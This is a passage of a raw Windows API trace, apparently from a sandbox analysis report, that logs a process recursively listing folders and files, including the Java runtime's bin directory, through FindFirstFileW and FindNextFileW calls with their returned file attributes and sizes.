cAlternateFileName="")) returned 1 [0179.308] FindNextFileW (in: hFindFile=0x43a2e18, lpFindFileData=0x39df584 | out: lpFindFileData=0x39df584*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30c952e, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x970b4468, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x970b4468, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1c4, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="install.ins", cAlternateFileName="")) returned 0 [0179.308] FindClose (in: hFindFile=0x43a2e18 | out: hFindFile=0x43a2e18) returned 1 [0179.308] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0179.308] FindNextFileW (in: hFindFile=0x43a2b98, lpFindFileData=0x39df800 | out: lpFindFileData=0x39df800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2de69a90, ftCreationTime.dwHighDateTime=0x1d48498, ftLastAccessTime.dwLowDateTime=0xf99f4140, ftLastAccessTime.dwHighDateTime=0x1d4bbb7, ftLastWriteTime.dwLowDateTime=0xf99f4140, ftLastWriteTime.dwHighDateTime=0x1d4bbb7, nFileSizeHigh=0x0, nFileSizeLow=0x12800, dwReserved0=0x0, dwReserved1=0x0, cFileName="spray-roman.exe", cAlternateFileName="SPRAY-~1.EXE")) returned 1 [0179.309] FindNextFileW (in: hFindFile=0x43a2b98, lpFindFileData=0x39df800 | out: lpFindFileData=0x39df800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a9b1003, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x2a9b1003, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x2a9b1003, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xc218, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqmapi.dll", cAlternateFileName="")) returned 1 [0179.309] FindNextFileW (in: hFindFile=0x43a2b98, lpFindFileData=0x39df800 | out: lpFindFileData=0x39df800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a9b1003, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x2a9b1003, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x2a9b1003, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xc218, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqmapi.dll", cAlternateFileName="")) returned 0 [0179.309] FindClose (in: hFindFile=0x43a2b98 | out: hFindFile=0x43a2b98) returned 1 [0179.309] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44250b0 | out: hHeap=0x680000) returned 1 [0179.309] FindNextFileW (in: hFindFile=0x43a2d98, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa235ac5b, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa235ac5b, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa235ac5b, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Java", cAlternateFileName="")) returned 1 [0179.309] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xfffe) returned 0x44250b0 [0179.309] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\*", lpFindFileData=0x39df800 | out: lpFindFileData=0x39df800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa235ac5b, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa235ac5b, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa235ac5b, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x43a2f58 [0179.312] FindNextFileW (in: hFindFile=0x43a2f58, lpFindFileData=0x39df800 | out: lpFindFileData=0x39df800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa235ac5b, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa235ac5b, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa235ac5b, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.312] FindNextFileW (in: hFindFile=0x43a2f58, lpFindFileData=0x39df800 | out: lpFindFileData=0x39df800*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xa235ac5b, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0de2f82, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xafba0b05, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jre1.8.0_144", cAlternateFileName="JRE18~1.0_1")) returned 1 [0179.312] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xfffe) returned 0x43b3078 [0179.312] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\*", lpFindFileData=0x39df584 | out: lpFindFileData=0x39df584*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xa235ac5b, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0de2f82, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xafba0b05, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x43a2a18 [0179.312] FindNextFileW (in: hFindFile=0x43a2a18, lpFindFileData=0x39df584 | out: lpFindFileData=0x39df584*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xa235ac5b, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0de2f82, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xafba0b05, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0179.312] FindNextFileW (in: hFindFile=0x43a2a18, lpFindFileData=0x39df584 | out: lpFindFileData=0x39df584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa7406c5a, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0eaff93, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bin", cAlternateFileName="")) returned 1 [0179.312] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xfffe) returned 0x43c3080 [0179.312] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\*", lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa7406c5a, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0eaff93, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x43a2d18 [0179.313] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa7406c5a, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0eaff93, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.313] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa742cea6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa742cea6, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa742cea6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x172440, dwReserved0=0x0, dwReserved1=0x0, cFileName="awt.dll", cAlternateFileName="")) returned 1 [0179.313] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa742cea6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa742cea6, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa742cea6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4240, dwReserved0=0x0, dwReserved1=0x0, cFileName="bci.dll", cAlternateFileName="")) returned 1 [0179.313] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa742cea6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa742cea6, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa742cea6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x27040, dwReserved0=0x0, dwReserved1=0x0, cFileName="dcpr.dll", cAlternateFileName="")) returned 1 [0179.313] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa742cea6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa742cea6, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa742cea6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x15040, dwReserved0=0x0, dwReserved1=0x0, cFileName="decora_sse.dll", cAlternateFileName="DECORA~1.DLL")) returned 1 [0179.313] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa742cea6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa742cea6, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa742cea6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x8f840, dwReserved0=0x0, dwReserved1=0x0, cFileName="deploy.dll", cAlternateFileName="")) returned 1 [0179.314] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa742cea6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0f2891a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa742cea6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="dtplugin", cAlternateFileName="")) returned 1 [0179.314] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xfffe) returned 0x4380050 [0179.317] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\*", lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa742cea6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0f2891a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa742cea6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x43a2a98 [0179.317] FindNextFileW (in: hFindFile=0x43a2a98, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa742cea6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0f2891a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa742cea6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0179.317] FindNextFileW (in: hFindFile=0x43a2a98, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa742cea6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa742cea6, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa742cea6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xfa840, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="deployJava1.dll", cAlternateFileName="DEPLOY~1.DLL")) returned 1 [0179.317] FindNextFileW (in: hFindFile=0x43a2a98, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa742cea6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa742cea6, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa742cea6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x11a640, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="npdeployJava1.dll", cAlternateFileName="NPDEPL~1.DLL")) returned 1 [0179.318] FindNextFileW (in: hFindFile=0x43a2a98, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa742cea6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa742cea6, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa742cea6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x11a640, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="npdeployJava1.dll", cAlternateFileName="NPDEPL~1.DLL")) returned 0 [0179.318] FindClose (in: hFindFile=0x43a2a98 | out: hFindFile=0x43a2a98) returned 1 [0179.318] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4380050 | out: hHeap=0x680000) returned 1 [0179.318] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa742cea6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa742cea6, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa742cea6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x7440, dwReserved0=0x0, dwReserved1=0x0, cFileName="dt_shmem.dll", cAlternateFileName="")) returned 1 [0179.318] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa742cea6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa742cea6, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa742cea6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x6040, dwReserved0=0x0, dwReserved1=0x0, cFileName="dt_socket.dll", cAlternateFileName="DT_SOC~1.DLL")) returned 1 [0179.318] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa742cea6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa742cea6, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa742cea6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x21440, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.dll", cAlternateFileName="")) returned 1 [0179.318] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x43040, dwReserved0=0x0, dwReserved1=0x0, cFileName="fontmanager.dll", cAlternateFileName="FONTMA~1.DLL")) returned 1 [0179.319] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x2da40, dwReserved0=0x0, dwReserved1=0x0, cFileName="fxplugins.dll", cAlternateFileName="FXPLUG~1.DLL")) returned 1 [0179.319] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x40e40, dwReserved0=0x0, dwReserved1=0x0, cFileName="glass.dll", cAlternateFileName="")) returned 1 [0179.319] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x6f440, dwReserved0=0x0, dwReserved1=0x0, cFileName="glib-lite.dll", cAlternateFileName="GLIB-L~1.DLL")) returned 1 [0179.319] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x97440, dwReserved0=0x0, dwReserved1=0x0, cFileName="gstreamer-lite.dll", cAlternateFileName="GSTREA~1.DLL")) returned 1 [0179.319] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x26a40, dwReserved0=0x0, dwReserved1=0x0, cFileName="hprof.dll", cAlternateFileName="")) returned 1 [0179.320] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x1e240, dwReserved0=0x0, dwReserved1=0x0, cFileName="instrument.dll", cAlternateFileName="INSTRU~1.DLL")) returned 1 [0179.320] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4a40, dwReserved0=0x0, dwReserved1=0x0, cFileName="j2pcsc.dll", cAlternateFileName="")) returned 1 [0179.320] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xf840, dwReserved0=0x0, dwReserved1=0x0, cFileName="j2pkcs11.dll", cAlternateFileName="")) returned 1 [0179.320] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x5240, dwReserved0=0x0, dwReserved1=0x0, cFileName="jaas_nt.dll", cAlternateFileName="")) returned 1 [0179.321] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x8640, dwReserved0=0x0, dwReserved1=0x0, cFileName="jabswitch.exe", cAlternateFileName="JABSWI~1.EXE")) returned 1 [0179.321] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x3e40, dwReserved0=0x0, dwReserved1=0x0, cFileName="java-rmi.exe", cAlternateFileName="")) returned 1 [0179.321] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x27040, dwReserved0=0x0, dwReserved1=0x0, cFileName="java.dll", cAlternateFileName="")) returned 1 [0179.321] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x32840, dwReserved0=0x0, dwReserved1=0x0, cFileName="java.exe", cAlternateFileName="")) returned 1 [0179.321] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x22c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="JavaAccessBridge-64.dll", cAlternateFileName="JAVAAC~1.DLL")) returned 1 [0179.322] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x2dc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="javacpl.cpl", cAlternateFileName="")) returned 1 [0179.322] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x13a40, dwReserved0=0x0, dwReserved1=0x0, cFileName="javacpl.exe", cAlternateFileName="")) returned 1 [0179.322] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x10e40, dwReserved0=0x0, dwReserved1=0x0, cFileName="javafx_font.dll", cAlternateFileName="JAVAFX~1.DLL")) returned 1 [0179.322] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, 